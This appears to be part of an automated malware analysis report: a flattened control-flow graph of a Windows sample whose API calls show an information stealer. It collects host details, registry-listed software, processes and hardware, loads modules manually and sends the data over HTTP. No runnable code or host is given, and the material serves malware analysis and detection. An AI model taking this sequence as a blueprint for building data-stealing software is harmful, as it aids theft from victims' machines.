91067->91068 91069 4060ee 91068->91069 91070 4107c9 lstrcpy 91069->91070 91071 4060fb 91070->91071 91072 410884 4 API calls 91071->91072 91073 406119 91072->91073 91074 4107c9 lstrcpy 91073->91074 91075 406126 91074->91075 91076 410884 4 API calls 91075->91076 91077 406143 91076->91077 91078 4107c9 lstrcpy 91077->91078 91079 406150 91078->91079 91080 410884 4 API calls 91079->91080 91081 40616d 91080->91081 91082 4107c9 lstrcpy 91081->91082 91083 40617a 91082->91083 91084 410884 4 API calls 91083->91084 91085 406198 91084->91085 91086 4107c9 lstrcpy 91085->91086 91087 4061a5 91086->91087 91088 410884 4 API calls 91087->91088 91089 4061c2 91088->91089 91090 4107c9 lstrcpy 91089->91090 91091 4061cf 91090->91091 91092 410884 4 API calls 91091->91092 91093 4061ec 91092->91093 91094 4107c9 lstrcpy 91093->91094 91095 4061f9 91094->91095 91096 410810 3 API calls 91095->91096 91097 406215 91096->91097 91098 4107c9 lstrcpy 91097->91098 91099 406222 91098->91099 91100 410884 4 API calls 91099->91100 91101 40623f 91100->91101 91102 4107c9 lstrcpy 91101->91102 91103 40624c 91102->91103 91104 410884 4 API calls 91103->91104 91105 40626a 91104->91105 91106 4107c9 lstrcpy 91105->91106 91107 406277 91106->91107 91108 410884 4 API calls 91107->91108 91109 406294 91108->91109 91110 4107c9 lstrcpy 91109->91110 91111 4062a1 91110->91111 91112 410884 4 API calls 91111->91112 91113 4062be 91112->91113 91114 4107c9 lstrcpy 91113->91114 91115 4062cb 91114->91115 91116 410810 3 API calls 91115->91116 91117 4062e7 91116->91117 91118 4107c9 lstrcpy 91117->91118 91119 4062f4 91118->91119 91120 406308 lstrlenA 91119->91120 91626 410935 91120->91626 91122 406319 lstrlenA GetProcessHeap HeapAlloc 91627 410935 91122->91627 91124 40633b lstrlenA 91628 410935 91124->91628 91126 40634b memcpy 91629 410935 91126->91629 91128 40635d lstrlenA 91129 40636d 91128->91129 91130 406376 lstrlenA memcpy 91129->91130 91630 410935 91130->91630 91132 406392 lstrlenA 91631 410935 91132->91631 91134 4063a2 HttpSendRequestA 91135 4063ee InternetReadFile 91134->91135 91136 406405 InternetCloseHandle 91135->91136 91138 4063b4 91135->91138 91136->91025 91137 410884 4 API calls 91137->91138 91138->91135 91138->91136 91138->91137 91139 4107c9 lstrcpy 91138->91139 91139->91138 91637 410935 91140->91637 91142 412997 strtok_s 91143 412a00 91142->91143 91144 4129a4 91142->91144 91143->89912 91145 4129e9 strtok_s 91144->91145 91146 41077f 2 API calls 91144->91146 91147 41077f 2 API calls 91144->91147 91145->91143 91145->91144 91146->91145 91147->91144 91638 410935 91148->91638 91150 412774 strtok_s 91151 412885 91150->91151 91153 412785 91150->91153 91151->89920 91152 412836 StrCmpCA 91152->91153 91153->91152 91154 41077f 2 API calls 91153->91154 91155 412868 strtok_s 91153->91155 91156 412805 StrCmpCA 91153->91156 91157 4127e0 StrCmpCA 91153->91157 91158 4127b2 StrCmpCA 91153->91158 91154->91155 91155->91151 91155->91153 91156->91153 91157->91153 91158->91153 91639 410935 91159->91639 91161 4128cb strtok_s 91162 412951 91161->91162 91164 4128d8 91161->91164 91162->89928 91163 412902 StrCmpCA 91163->91164 91164->91163 91165 41077f 2 API calls 91164->91165 91166 41293a strtok_s 91164->91166 91167 41077f 2 API calls 91164->91167 91165->91166 91166->91162 91166->91164 91167->91164 91169 41070b lstrcpy 91168->91169 91170 415a53 91169->91170 91171 410884 4 API calls 91170->91171 91172 415a68 91171->91172 91173 4107c9 lstrcpy 91172->91173 91174 415a75 91173->91174 91175 410884 4 API calls 91174->91175 91176 415a93 91175->91176 91177 4107c9 lstrcpy 91176->91177 91178 415aa0 91177->91178 91179 410884 4 API calls 91178->91179 91180 415abd 91179->91180 91181 4107c9 lstrcpy 91180->91181 91182 415aca 91181->91182 91183 410884 4 API calls 91182->91183 91184 415ae7 91183->91184 91185 4107c9 lstrcpy 91184->91185 91186 415af4 91185->91186 91187 410884 4 API calls 91186->91187 91188 415b11 91187->91188 91189 4107c9 lstrcpy 91188->91189 91190 415b1e 91189->91190 91640 410a20 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 91190->91640 91192 415b2f 91193 410884 4 API calls 91192->91193 91194 415b3c 91193->91194 91195 4107c9 lstrcpy 91194->91195 91196 415b49 91195->91196 91197 410884 4 API calls 91196->91197 91198 415b66 91197->91198 91199 4107c9 lstrcpy 91198->91199 91200 415b73 91199->91200 91201 410884 4 API calls 91200->91201 91202 415b90 91201->91202 91203 4107c9 lstrcpy 91202->91203 91204 415b9d 91203->91204 91641 4111fd memset RegOpenKeyExA 91204->91641 91206 415bae 91207 410884 4 API calls 91206->91207 91208 415bbb 91207->91208 91209 4107c9 lstrcpy 91208->91209 91210 415bc8 91209->91210 91211 410884 4 API calls 91210->91211 91212 415be5 91211->91212 91213 4107c9 lstrcpy 91212->91213 91214 415bf2 91213->91214 91215 410884 4 API calls 91214->91215 91216 415c0f 91215->91216 91217 4107c9 lstrcpy 91216->91217 91218 415c1c 91217->91218 91219 41128a 2 API calls 91218->91219 91220 415c31 91219->91220 91221 410810 3 API calls 91220->91221 91222 415c43 91221->91222 91223 4107c9 lstrcpy 91222->91223 91224 415c50 91223->91224 91225 410884 4 API calls 91224->91225 91226 415c79 91225->91226 91227 4107c9 lstrcpy 91226->91227 91228 415c86 91227->91228 91229 410884 4 API calls 91228->91229 91230 415ca3 91229->91230 91231 4107c9 lstrcpy 91230->91231 91232 415cb0 91231->91232 91233 4112c5 13 API calls 91232->91233 91234 415cc5 91233->91234 91235 410810 3 API calls 91234->91235 91236 415cd7 91235->91236 91237 4107c9 lstrcpy 91236->91237 91238 415ce4 91237->91238 91239 410884 4 API calls 91238->91239 91240 415d0d 91239->91240 91241 4107c9 lstrcpy 91240->91241 91242 415d1a 91241->91242 91243 410884 4 API calls 91242->91243 91244 415d37 91243->91244 91245 4107c9 lstrcpy 91244->91245 91246 415d44 91245->91246 91247 415d50 GetCurrentProcessId 91246->91247 91645 411de9 OpenProcess 91247->91645 91250 410810 3 API calls 91251 415d73 91250->91251 91252 4107c9 lstrcpy 91251->91252 91253 415d80 91252->91253 91254 410884 4 API calls 91253->91254 91255 415da9 91254->91255 91256 4107c9 lstrcpy 91255->91256 91257 415db6 91256->91257 91258 410884 4 API calls 91257->91258 91259 415dd3 91258->91259 91260 4107c9 lstrcpy 91259->91260 91261 415de0 91260->91261 91262 410884 4 API calls 91261->91262 91263 415dfd 91262->91263 91264 4107c9 lstrcpy 91263->91264 91265 415e0a 91264->91265 91266 410884 4 API calls 91265->91266 91267 415e27 91266->91267 91268 4107c9 lstrcpy 91267->91268 91269 415e34 91268->91269 91650 411433 GetProcessHeap HeapAlloc 91269->91650 91272 410884 4 API calls 91273 415e52 91272->91273 91274 4107c9 lstrcpy 91273->91274 91275 415e5f 91274->91275 91276 410884 4 API calls 91275->91276 91277 415e7c 91276->91277 91278 4107c9 lstrcpy 91277->91278 91279 415e89 91278->91279 91280 410884 4 API calls 91279->91280 91281 415ea6 91280->91281 91282 4107c9 lstrcpy 91281->91282 91283 415eb3 91282->91283 91656 411564 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 91283->91656 91286 410810 3 API calls 91287 415eda 91286->91287 91288 4107c9 lstrcpy 91287->91288 91289 415ee7 91288->91289 91290 410884 4 API calls 91289->91290 91291 415f10 91290->91291 91292 4107c9 lstrcpy 91291->91292 91293 415f1d 91292->91293 91294 410884 4 API calls 91293->91294 91295 415f3a 91294->91295 91296 4107c9 lstrcpy 91295->91296 91297 415f47 91296->91297 91669 41170d _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 91297->91669 91300 410810 3 API calls 91301 415f6e 91300->91301 91302 4107c9 lstrcpy 91301->91302 91303 415f7b 91302->91303 91304 410884 4 API calls 91303->91304 91305 415fa4 91304->91305 91306 4107c9 lstrcpy 91305->91306 91307 415fb1 91306->91307 91308 410884 4 API calls 91307->91308 91309 415fce 91308->91309 91310 4107c9 lstrcpy 91309->91310 91311 415fdb 91310->91311 91682 4109e5 GetProcessHeap HeapAlloc GetComputerNameA 91311->91682 91314 410884 4 API calls 91315 415ff9 91314->91315 91316 4107c9 lstrcpy 91315->91316 91317 416006 91316->91317 91318 410884 4 API calls 91317->91318 91319 416023 91318->91319 91320 4107c9 lstrcpy 91319->91320 91321 416030 91320->91321 91322 410884 4 API calls 91321->91322 91323 41604d 91322->91323 91324 4107c9 lstrcpy 91323->91324 91325 41605a 91324->91325 91684 4109b3 GetProcessHeap HeapAlloc GetUserNameA 91325->91684 91327 41606b 91328 410884 4 API calls 91327->91328 91329 416078 91328->91329 91330 4107c9 lstrcpy 91329->91330 91331 416085 91330->91331 91332 410884 4 API calls 91331->91332 91333 4160a2 91332->91333 91334 4107c9 lstrcpy 91333->91334 91335 4160af 91334->91335 91336 410884 4 API calls 91335->91336 91337 4160cc 91336->91337 91338 4107c9 lstrcpy 91337->91338 91339 4160d9 91338->91339 91685 411188 7 API calls 91339->91685 91342 410810 3 API calls 91343 416100 91342->91343 91344 4107c9 lstrcpy 91343->91344 91345 41610d 91344->91345 91346 410884 4 API calls 91345->91346 91347 416136 91346->91347 91348 4107c9 lstrcpy 91347->91348 91349 416143 91348->91349 91350 410884 4 API calls 91349->91350 91351 416160 91350->91351 91352 4107c9 lstrcpy 91351->91352 91353 41616d 91352->91353 91688 410acd _EH_prolog 91353->91688 91356 410810 3 API calls 91357 416197 91356->91357 91358 4107c9 lstrcpy 91357->91358 91359 4161a4 91358->91359 91360 410884 4 API calls 91359->91360 91361 4161d3 91360->91361 91362 4107c9 lstrcpy 91361->91362 91363 4161e0 91362->91363 91364 410884 4 API calls 91363->91364 91365 416203 91364->91365 91366 4107c9 lstrcpy 91365->91366 91367 416210 91366->91367 91698 410a20 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 91367->91698 91369 416224 91370 410884 4 API calls 91369->91370 91371 416234 91370->91371 91372 4107c9 lstrcpy 91371->91372 91373 416241 91372->91373 91374 410884 4 API calls 91373->91374 91375 416264 91374->91375 91376 4107c9 lstrcpy 91375->91376 91377 416271 91376->91377 91378 410884 4 API calls 91377->91378 91379 416291 91378->91379 91380 4107c9 lstrcpy 91379->91380 91381 41629e 91380->91381 91699 410a7a GetProcessHeap HeapAlloc GetTimeZoneInformation 91381->91699 91384 410884 4 API calls 91385 4162bc 91384->91385 91386 4107c9 lstrcpy 91385->91386 91387 4162c9 91386->91387 91388 410884 4 API calls 91387->91388 91389 4162e9 91388->91389 91390 4107c9 lstrcpy 91389->91390 91391 4162f6 91390->91391 91392 410884 4 API calls 91391->91392 91393 416319 91392->91393 91394 4107c9 lstrcpy 91393->91394 91395 416326 91394->91395 91396 410884 4 API calls 91395->91396 91397 416349 91396->91397 91398 4107c9 lstrcpy 91397->91398 91399 416356 91398->91399 91702 410c00 GetProcessHeap HeapAlloc RegOpenKeyExA 91399->91702 91402 410884 4 API calls 91403 41637a 91402->91403 91404 4107c9 lstrcpy 91403->91404 91405 416387 91404->91405 91406 410884 4 API calls 91405->91406 91407 4163aa 91406->91407 91408 4107c9 lstrcpy 91407->91408 91409 4163b7 91408->91409 91410 410884 4 API calls 91409->91410 91411 4163d7 91410->91411 91412 4107c9 lstrcpy 91411->91412 91413 4163e4 91412->91413 91705 410c9c 91413->91705 91416 410884 4 API calls 91417 416402 91416->91417 91418 4107c9 lstrcpy 91417->91418 91419 41640f 91418->91419 91420 410884 4 API calls 91419->91420 91421 41642f 91420->91421 91422 4107c9 lstrcpy 91421->91422 91423 41643c 91422->91423 91424 410884 4 API calls 91423->91424 91425 41645c 91424->91425 91426 4107c9 lstrcpy 91425->91426 91427 416469 91426->91427 91720 410c69 GetSystemInfo wsprintfA 91427->91720 91429 41647a 91430 410884 4 API calls 91429->91430 91431 416487 91430->91431 91432 4107c9 lstrcpy 91431->91432 91433 416494 91432->91433 91434 410884 4 API calls 91433->91434 91435 4164b4 91434->91435 91436 4107c9 lstrcpy 91435->91436 91437 4164c1 91436->91437 91438 410884 4 API calls 91437->91438 91439 4164e1 91438->91439 91440 4107c9 lstrcpy 91439->91440 91441 4164ee 91440->91441 91721 410d69 GetProcessHeap HeapAlloc 91441->91721 91443 4164ff 91444 410884 4 API calls 91443->91444 91445 41650c 91444->91445 91446 4107c9 lstrcpy 91445->91446 91447 416519 91446->91447 91448 410884 4 API calls 91447->91448 91449 416539 91448->91449 91450 4107c9 lstrcpy 91449->91450 91451 416546 91450->91451 91452 410884 4 API calls 91451->91452 91453 416569 91452->91453 91454 4107c9 lstrcpy 91453->91454 91455 416576 91454->91455 91726 410dd2 _EH_prolog 91455->91726 91458 410810 3 API calls 91459 4165a6 91458->91459 91460 4107c9 lstrcpy 91459->91460 91461 4165b3 91460->91461 91462 410884 4 API calls 91461->91462 91463 4165e5 91462->91463 91464 4107c9 lstrcpy 91463->91464 91465 4165f2 91464->91465 91466 410884 4 API calls 91465->91466 91467 416615 91466->91467 91468 4107c9 lstrcpy 91467->91468 91469 416622 91468->91469 91732 4110ab _EH_prolog 91469->91732 91471 41663d 91472 410810 3 API calls 91471->91472 91473 416652 91472->91473 91474 4107c9 lstrcpy 91473->91474 91475 41665f 91474->91475 91476 410884 4 API calls 91475->91476 91477 416691 91476->91477 91478 4107c9 lstrcpy 91477->91478 91479 41669e 91478->91479 91480 410884 4 API calls 91479->91480 91481 4166c1 91480->91481 91482 4107c9 lstrcpy 91481->91482 91483 4166ce 91482->91483 91740 410e59 _EH_prolog 91483->91740 91485 4166eb 91486 410810 3 API calls 91485->91486 91487 416701 91486->91487 91488 4107c9 lstrcpy 91487->91488 91489 41670e 91488->91489 91490 410e59 15 API calls 91489->91490 91491 41673a 91490->91491 91492 410810 3 API calls 91491->91492 91493 41674d 91492->91493 91494 4107c9 lstrcpy 91493->91494 91495 41675a 91494->91495 91496 410884 4 API calls 91495->91496 91497 416786 91496->91497 91498 4107c9 lstrcpy 91497->91498 91499 416793 91498->91499 91500 4167a7 lstrlenA 91499->91500 91501 4167b7 91500->91501 91502 41070b lstrcpy 91501->91502 91503 4167cd 91502->91503 91504 4010b1 2 API calls 91503->91504 91505 4167e5 91504->91505 91756 415865 _EH_prolog 91505->91756 91507 4167f2 91508 401061 _EH_prolog 91507->91508 91509 416818 91508->91509 91509->89933 91511 410742 lstrcpy 91510->91511 91512 4041dd 91511->91512 91513 403a54 6 API calls 91512->91513 91514 4041e9 GetProcessHeap RtlAllocateHeap 91513->91514 92026 410935 91514->92026 91516 404223 InternetOpenA StrCmpCA 91517 404242 91516->91517 91518 404378 InternetCloseHandle 91517->91518 91519 40424d InternetConnectA 91517->91519 91522 4042e9 91518->91522 91520 40426d HttpOpenRequestA 91519->91520 91521 40436f InternetCloseHandle 91519->91521 91523 4042a2 91520->91523 91524 404368 InternetCloseHandle 91520->91524 91521->91518 91522->89938 91525 4042a6 InternetSetOptionA 91523->91525 91526 4042bc HttpSendRequestA HttpQueryInfoA 91523->91526 91524->91521 91525->91526 91526->91522 91528 40430c 91526->91528 91527 404326 InternetReadFile 91527->91524 91527->91528 91528->91522 91528->91524 91528->91527 92027 406c18 91529->92027 91531 40fbdd 91532 4010b1 2 API calls 91531->91532 91533 40fbee 91532->91533 92269 40f43a 237 API calls 91533->92269 91535 40f9d2 StrCmpCA 91537 40f9aa 91535->91537 91536 40fbf3 91538 4010b1 2 API calls 91536->91538 91537->91531 91537->91535 91539 40fa46 StrCmpCA 91537->91539 91542 41070b lstrcpy 91537->91542 91543 40fb62 StrCmpCA 91537->91543 91548 410810 3 API calls 91537->91548 91550 410742 lstrcpy 91537->91550 91551 410884 _EH_prolog lstrlenA lstrcpy lstrcat 91537->91551 91553 4107c9 lstrcpy 91537->91553 91562 4010b1 _EH_prolog lstrcpy 91537->91562 92030 40e080 _EH_prolog 91537->92030 92084 40e341 _EH_prolog 91537->92084 92197 40c544 _EH_prolog 91537->92197 91540 40fc01 91538->91540 91539->91537 92270 40c86e 108 API calls 91540->92270 91542->91537 91543->91537 91544 40fe3d 91545 401061 _EH_prolog 91544->91545 91547 40fe49 91545->91547 91547->89942 91548->91537 91549 40fc31 StrCmpCA 91566 40fc06 91549->91566 91550->91537 91551->91537 91552 40fca6 StrCmpCA 91552->91566 91553->91537 91554 41070b lstrcpy 91554->91566 91556 410742 lstrcpy 91556->91566 91557 40fdc1 StrCmpCA 91557->91566 91558 410884 _EH_prolog lstrlenA lstrcpy lstrcat 91558->91566 91559 4010b1 _EH_prolog lstrcpy 91559->91566 91560 40e080 192 API calls 91560->91566 91561 410810 3 API calls 91561->91566 91562->91537 91563 4107c9 lstrcpy 91563->91566 91564 40c544 191 API calls 91564->91566 91566->91544 91566->91549 91566->91552 91566->91554 91566->91556 91566->91557 91566->91558 91566->91559 91566->91560 91566->91561 91566->91563 91566->91564 91567 40e341 193 API calls 91566->91567 91567->91566 91585 41070b lstrcpy 91584->91585 91586 402128 91585->91586 91586->90771 91588 401081 91587->91588 91588->90764 91589->90771 91590->90771 91591->90771 91592->90771 91593->90757 91594->90723 91595->90756 91596->90742 91597->90723 91598->90722 91599->90723 91600->90708 91601->90723 91603 41070b lstrcpy 91602->91603 91604 402142 91603->91604 91604->90698 91605->90709 91606->90756 91608 4112a8 91607->91608 91609 41070b lstrcpy 91608->91609 91610 4112b8 91609->91610 91610->90796 91611->90800 91613 403a6d 91612->91613 91613->91613 91614 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 91613->91614 91623 410935 91614->91623 91616 403ab6 lstrlenA 91624 410935 91616->91624 91618 403ac6 InternetCrackUrlA 91619 403ae4 91618->91619 91619->90809 91620->90934 91622 41077d 91621->91622 91622->90858 91623->91616 91624->91618 91625->90943 91626->91122 91627->91124 91628->91126 91629->91128 91630->91132 91631->91134 91633 406da9 LocalAlloc 91632->91633 91634 406436 91632->91634 91633->91634 91635 406db9 CryptStringToBinaryA 91633->91635 91634->90987 91634->90998 91635->91634 91636 406dd0 LocalFree 91635->91636 91636->91634 91637->91142 91638->91150 91639->91161 91640->91192 91642 411264 CharToOemA 91641->91642 91643 411249 RegQueryValueExA 91641->91643 91642->91206 91643->91642 91646 411e29 91645->91646 91647 411e0d K32GetModuleFileNameExA CloseHandle 91645->91647 91648 41070b lstrcpy 91646->91648 91647->91646 91649 411e38 91648->91649 91649->91250 91775 4109a5 91650->91775 91653 411466 RegOpenKeyExA 91654 41145f 91653->91654 91655 411486 RegQueryValueExA 91653->91655 91654->91272 91655->91654 91657 4115cd 91656->91657 91658 4115d5 CoSetProxyBlanket 91657->91658 91659 4116d2 91657->91659 91661 411605 91658->91661 91660 41070b lstrcpy 91659->91660 91662 4116e3 91660->91662 91661->91659 91663 411639 VariantInit 91661->91663 91662->91286 91664 41165c 91663->91664 91781 4114ac _EH_prolog CoCreateInstance 91664->91781 91666 41166a FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 91667 41070b lstrcpy 91666->91667 91668 4116c6 VariantClear 91667->91668 91668->91662 91670 411776 91669->91670 91671 41181b 91670->91671 91672 41177e CoSetProxyBlanket 91670->91672 91673 41070b lstrcpy 91671->91673 91674 4117ae 91672->91674 91675 41182c 91673->91675 91674->91671 91676 4117da VariantInit 91674->91676 91675->91300 91677 4117fd 91676->91677 91787 411a75 LocalAlloc CharToOemW 91677->91787 91679 411805 91680 41070b lstrcpy 91679->91680 91681 41180f VariantClear 91680->91681 91681->91675 91683 410a1b 91682->91683 91683->91314 91684->91327 91686 41070b lstrcpy 91685->91686 91687 4111f5 91686->91687 91687->91342 91689 41070b lstrcpy 91688->91689 91690 410af5 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 91689->91690 91691 410be0 91690->91691 91696 410b30 91690->91696 91693 410bf1 91691->91693 91694 410be8 LocalFree 91691->91694 91692 410b35 GetLocaleInfoA 91692->91696 91693->91356 91694->91693 91695 410884 _EH_prolog lstrlenA lstrcpy lstrcat 91695->91696 91696->91691 91696->91692 91696->91695 91697 4107c9 lstrcpy 91696->91697 91697->91696 91698->91369 91700 410ac8 91699->91700 91701 410aac wsprintfA 91699->91701 91700->91384 91701->91700 91703 410c43 RegQueryValueExA 91702->91703 91704 410c5b 91702->91704 91703->91704 91704->91402 91706 410cee GetLogicalProcessorInformationEx 91705->91706 91707 410cc4 GetLastError 91706->91707 91708 410cf9 91706->91708 91709 410d4d 91707->91709 91710 410ccf 91707->91710 91790 4118c6 GetProcessHeap HeapFree 91708->91790 91712 410d57 91709->91712 91791 4118c6 GetProcessHeap HeapFree 91709->91791 91718 410cd3 91710->91718 91712->91416 91713 410d20 91713->91712 91717 410d26 wsprintfA 91713->91717 91717->91712 91718->91706 91719 410d46 91718->91719 91788 4118c6 GetProcessHeap HeapFree 91718->91788 91789 4118e3 GetProcessHeap HeapAlloc 91718->91789 91719->91712 91720->91429 91792 41188f 91721->91792 91724 410da9 wsprintfA 91724->91443 91727 41070b lstrcpy 91726->91727 91729 410df8 91727->91729 91728 410e34 EnumDisplayDevicesA 91728->91729 91730 410e49 91728->91730 91729->91728 91729->91730 91731 41077f 2 API calls 91729->91731 91730->91458 91731->91729 91733 41070b lstrcpy 91732->91733 91734 4110d5 CreateToolhelp32Snapshot Process32First 91733->91734 91735 41116e CloseHandle 91734->91735 91737 411106 91734->91737 91735->91471 91736 41115a Process32Next 91736->91735 91736->91737 91737->91736 91738 410884 _EH_prolog lstrlenA lstrcpy lstrcat 91737->91738 91739 4107c9 lstrcpy 91737->91739 91738->91737 91739->91737 91741 41070b lstrcpy 91740->91741 91742 410e7d RegOpenKeyExA 91741->91742 91743 410eb0 91742->91743 91754 410ecf 91742->91754 91745 410742 lstrcpy 91743->91745 91744 410ed8 RegEnumKeyExA 91746 410f01 wsprintfA RegOpenKeyExA 91744->91746 91744->91754 91751 410ebc 91745->91751 91747 41106b 91746->91747 91748 410f45 RegQueryValueExA 91746->91748 91750 410742 lstrcpy 91747->91750 91749 410f6f lstrlenA 91748->91749 91748->91754 91749->91754 91750->91751 91751->91485 91752 410884 _EH_prolog lstrlenA lstrcpy lstrcat 91752->91754 91753 410fda RegQueryValueExA 91753->91754 91754->91744 91754->91747 91754->91752 91754->91753 91755 4107c9 lstrcpy 91754->91755 91755->91754 91794 41418c _EH_prolog 91756->91794 91758 415888 91759 4107c9 lstrcpy 91758->91759 91760 4158aa 91759->91760 91761 4107c9 lstrcpy 91760->91761 91762 4158ce 91761->91762 91763 4107c9 lstrcpy 91762->91763 91764 4158da 91763->91764 91765 4107c9 lstrcpy 91764->91765 91766 4158e6 91765->91766 91767 4158ed Sleep 91766->91767 91768 4158fd CreateThread WaitForSingleObject 91766->91768 91767->91766 91769 41070b lstrcpy 91768->91769 91798 414052 _EH_prolog 91768->91798 91770 41592b 91769->91770 91796 4141d8 _EH_prolog 91770->91796 91772 41593e 91773 401061 _EH_prolog 91772->91773 91774 41594a 91773->91774 91774->91507 91778 410938 GetProcessHeap HeapAlloc RegOpenKeyExA 91775->91778 91777 4109aa 91777->91653 91777->91654 91779 41097b RegQueryValueExA 91778->91779 91780 410992 91778->91780 91779->91780 91780->91777 91782 4114e2 SysAllocString 91781->91782 91783 411540 91781->91783 91782->91783 91785 4114f1 91782->91785 91783->91666 91784 411539 SysFreeString 91784->91783 91785->91784 91786 41151d _wtoi64 SysFreeString 91785->91786 91786->91784 91787->91679 91788->91718 91789->91718 91790->91713 91791->91712 91793 410d93 GlobalMemoryStatusEx 91792->91793 91793->91724 91795 4141a5 91794->91795 91795->91758 91797 4141f8 91796->91797 91797->91772 91807 410935 91798->91807 91800 414073 lstrlenA 91801 41407f 91800->91801 91803 41408a 91800->91803 91802 410742 lstrcpy 91802->91803 91803->91802 91805 4107c9 lstrcpy 91803->91805 91806 414132 StrCmpCA 91803->91806 91808 4043ad _EH_prolog 91803->91808 91805->91803 91806->91801 91806->91803 91807->91800 91809 41070b lstrcpy 91808->91809 91810 4043d9 91809->91810 91811 410742 lstrcpy 91810->91811 91812 4043ee 91811->91812 91813 403a54 6 API calls 91812->91813 91814 4043fa 91813->91814 92013 411b94 91814->92013 91816 404426 91817 404431 lstrlenA 91816->91817 91818 404441 91817->91818 91819 411b94 4 API calls 91818->91819 91820 40444f 91819->91820 91821 41070b lstrcpy 91820->91821 91822 40445f 91821->91822 91823 41070b lstrcpy 91822->91823 91824 404470 91823->91824 91825 41070b lstrcpy 91824->91825 91826 404481 91825->91826 91827 41070b lstrcpy 91826->91827 91828 404492 StrCmpCA 91827->91828 91830 4044ae 91828->91830 91829 4044d4 91831 411944 3 API calls 91829->91831 91830->91829 91833 4044c3 InternetOpenA 91830->91833 91832 4044df 91831->91832 91834 410810 3 API calls 91832->91834 91833->91829 91842 404cf2 91833->91842 91835 4044f5 91834->91835 91836 4107c9 lstrcpy 91835->91836 91837 404502 91836->91837 91838 410884 4 API calls 91837->91838 91839 40452e 91838->91839 91840 410810 3 API calls 91839->91840 91841 404544 91840->91841 91843 410884 4 API calls 91841->91843 91844 410742 lstrcpy 91842->91844 91845 404558 91843->91845 91856 404c4e 91844->91856 91846 4107c9 lstrcpy 91845->91846 91847 404565 91846->91847 91848 410884 4 API calls 91847->91848 91849 40459e 91848->91849 91850 410810 3 API calls 91849->91850 91851 4045b1 91850->91851 91852 4107c9 lstrcpy 91851->91852 91853 4045be 91852->91853 91854 4045d6 InternetConnectA 91853->91854 91854->91842 91856->91803 92014 411ba5 CryptBinaryToStringA 92013->92014 92016 411ba1 92013->92016 92015 411bc2 GetProcessHeap HeapAlloc 92014->92015 92014->92016 92015->92016 92017 411bdf CryptBinaryToStringA 92015->92017 92016->91816 92017->92016 92026->91516 92271 406be1 92027->92271 92029 406c27 92029->91537 92031 41070b lstrcpy 92030->92031 92032 40e0a4 92031->92032 92324 411b09 SHGetFolderPathA 92032->92324 92035 410810 3 API calls 92036 40e0ce 92035->92036 92037 4107c9 lstrcpy 92036->92037 92038 40e0db 92037->92038 92039 410810 3 API calls 92038->92039 92040 40e103 92039->92040 92041 4107c9 lstrcpy 92040->92041 92085 41070b lstrcpy 92084->92085 92086 40e365 92085->92086 92087 41070b lstrcpy 92086->92087 92088 40e376 92087->92088 92089 40e38f StrCmpCA 92088->92089 92090 40e3a0 92089->92090 92091 40e614 92089->92091 92093 411b09 2 API calls 92090->92093 92092 411b09 2 API calls 92091->92092 92094 40e61d 92092->92094 92095 40e3a9 92093->92095 92096 410810 3 API calls 92094->92096 92097 410810 3 API calls 92095->92097 92098 40e630 92096->92098 92099 40e3bc 92097->92099 92100 4107c9 lstrcpy 92098->92100 92101 4107c9 lstrcpy 92099->92101 92102 40e63d 92100->92102 92103 40e3c9 92101->92103 92198 41070b lstrcpy 92197->92198 92199 40c567 92198->92199 92200 41070b lstrcpy 92199->92200 92201 40c578 92200->92201 92202 411b09 2 API calls 92201->92202 92203 40c587 92202->92203 92204 410810 3 API calls 92203->92204 92205 40c59a 92204->92205 92206 4107c9 lstrcpy 92205->92206 92207 40c5a7 92206->92207 92208 410810 3 API calls 92207->92208 92209 40c5cf 92208->92209 92269->91536 92270->91566 92272 406bec 92271->92272 92275 406aad 92272->92275 92274 406bfd 92274->92029 92278 406946 92275->92278 92279 40695f 92278->92279 92291 406957 92278->92291 92294 4064dd 92279->92294 92283 406992 92283->92291 92306 40676b 92283->92306 92288 406a0c 92288->92291 92320 4118c6 GetProcessHeap HeapFree 92288->92320 92289 406a4d FreeLibrary 92289->92289 92290 406a5f 92289->92290 92319 4118c6 GetProcessHeap HeapFree 92290->92319 92291->92274 92296 4064ec 92294->92296 92295 4064f3 92295->92291 92300 406590 92295->92300 92296->92295 92297 406543 92296->92297 92321 4118e3 GetProcessHeap HeapAlloc 92297->92321 92299 406552 92299->92295 92301 4065d8 VirtualAlloc 92300->92301 92304 4065af 92300->92304 92302 406608 92301->92302 92303 40660e 92301->92303 92302->92303 92305 406613 VirtualAlloc 92302->92305 92303->92283 92304->92301 92305->92303 92307 406893 92306->92307 92308 406785 92306->92308 92307->92291 92315 4068a6 92307->92315 92308->92307 92309 40679f LoadLibraryA 92308->92309 92310 406899 92309->92310 92313 4067b9 92309->92313 92310->92307 92312 406865 GetProcAddress 92312->92310 92312->92313 92313->92308 92313->92310 92313->92312 92322 4118e3 GetProcessHeap HeapAlloc 92313->92322 92323 4118c6 GetProcessHeap HeapFree 92313->92323 92316 40693b 92315->92316 92318 4068bc 92315->92318 92316->92288 92316->92289 92316->92290 92316->92291 92317 406911 VirtualProtect 92317->92316 92317->92318 92318->92316 92318->92317 92319->92288 92320->92291 92321->92299 92322->92313 92323->92313 92325 41070b lstrcpy 92324->92325 92326 40e0bb 92325->92326 92326->92035 92829 1b68fd40 92831 1b68fd67 92829->92831 92830 1b68fdf4 ReadFile 92830->92831 92832 1b68fd83 92830->92832 92831->92830 92831->92832 92833 1b697d30 92834 1b697d43 92833->92834 92836 1b697d49 92833->92836 92837 1b818d80 92834->92837 92838 1b818d8f __vsnprintf 92837->92838 92840 1b818e6f 92838->92840 92841 1b694cf0 92838->92841 92840->92836 92843 1b694d30 92841->92843 92842 1b694ed5 CreateFileW 92842->92843 92843->92842 92844 1b69506d 92843->92844 92844->92840

                                              Control-flow Graph

                                              APIs
                                              • GetProcAddress.KERNEL32(75900000,00417EFC), ref: 00418B11
                                              • GetProcAddress.KERNEL32 ref: 00418B28
                                              • GetProcAddress.KERNEL32 ref: 00418B3F
                                              • GetProcAddress.KERNEL32 ref: 00418B56
                                              • GetProcAddress.KERNEL32 ref: 00418B6D
                                              • GetProcAddress.KERNEL32 ref: 00418B84
                                              • GetProcAddress.KERNEL32 ref: 00418B9B
                                              • GetProcAddress.KERNEL32 ref: 00418BB2
